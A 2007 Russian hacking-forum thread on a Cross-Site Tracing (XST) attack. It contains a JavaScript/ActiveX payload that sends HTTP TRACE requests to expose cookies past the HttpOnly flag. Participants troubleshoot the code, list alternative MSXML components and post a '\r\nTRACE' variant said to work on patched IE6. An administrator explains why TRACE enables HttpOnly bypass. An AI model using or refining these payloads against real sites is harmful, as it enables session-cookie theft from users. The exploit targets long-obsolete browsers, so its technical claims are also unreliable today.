Trace атака

Discussion in 'Песочница' started by Alloc, 18 Aug 2007.

  1. Alloc

    Alloc New Member

    Joined:
    12 Aug 2007
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток уважаемые Хакеры!

    На одном сайте XSpider написал, что возможно атака с помощью метода TRACE.
    в инете нашел такой код
    Code:
    <script> 
function xssDomainTraceRequest(){ 
var xmlHttp = new ActiveXObject('Microsoft.XMLHTTP'); 
var exampleCode = xmlHttp; 
xmlHttp.open ("TRACE","http://site.ru",false); 
xmlHttp.send (); 
xmlDoc=xmlHttp.responseText; 
alert (xmlDoc); 
var target = "http://site.ru"; 
cExampleCode = encodeURIComponent(exampleCode + ';top.close()'); 
var readyCode = 'font-size: expression(execScript(decodeURIComponent("' + 
cExampleCode + '")))'; 
showModalDialog(target, null, readyCode); 
} 
</script> 

<INPUT TYPE="BUTTON" OnClick="xssDomainTraceRequest()" VALUE="Show Cookie 
Information Using TRACE">
    подставляю за место http://site.ru мой сайт.
    заливаю к себе на хостинг, жму кнопку и ничего ни в опере, ни в IE не нажимается... Что я делаю не так? Подскажите пожалуйста.
     
    #1 Alloc, 18 Aug 2007
  2. hrom

    hrom Banned

    Joined:
    29 Jun 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    чушь это все ищи другую дырку
     
    #2 hrom, 18 Aug 2007
  3. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    Открою страшный "секрет", Trace широко использовался для проведение xss, как метод обход атрибута "HttpOnly". С выходом(если точнее то патч) IE 6 стал доступен атрибут HTTP-only который при обращение к document.cookie возвращал пустую строчку( при попытки запроса к кукам ). Т.е. один из методов "перехвата"/получения данных которые были отосланы при запросе(HTTP-заголовки), Request line>Headers>Post data. По умолчанию метод HTTP TRACE включеным на серверах(отсутствие директивы "TraceEnable off" как таковой).
    Пример:
    [​IMG]
     
    _________________________
    #3 ettee, 18 Aug 2007
    Last edited: 18 Aug 2007
  4. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Что значит не нажимается, включи в броузере яваскрипт - тогда будет нажиматься. Если не работает см. ошибки скрипта, например ИЕ указывает в каких строчках вываливается ошибка.
    ЗЫ возможно у тя др. компонента активХ, например попробуй след.
    'MSXML2.XMLHTTP.6.0',
    'MSXML2.XMLHTTP.5.0',
    'MSXML2.XMLHTTP.4.0',
    'MSXML2.XMLHTTP.3.0',
    'MSXML2.XMLHTTP',
     
    #4 [53x]Shadow, 18 Aug 2007
  5. XenOtai

    XenOtai Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    25
    Likes Received:
    17
    Reputations:
    16
    Перепробовал различные коды, в ошибке постоянно писало "Недопустимый вызов или аргумент процедуры". Может, у кого-нибудь есть работающая страница, отсылающая запрос на какой-нибудь сайт?
     
    #5 XenOtai, 16 Sep 2007
  6. PGArchangel

    PGArchangel New Member

    Joined:
    13 Jul 2007
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    xmlHttp.open ("\r\nTRACE","http://site.ru",false);
    Это на ИЕ6 с патчем работает. На ИЕ7 уже нет. На Локалхосте тестил. На внешке пробовал - по-началу работало, потом ИЕ стал просто зависать. :) Так и не понял, почему, но, видимо, сервер просто перестал отвечать.
     
    #6 PGArchangel, 17 Sep 2007
    1 person likes this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.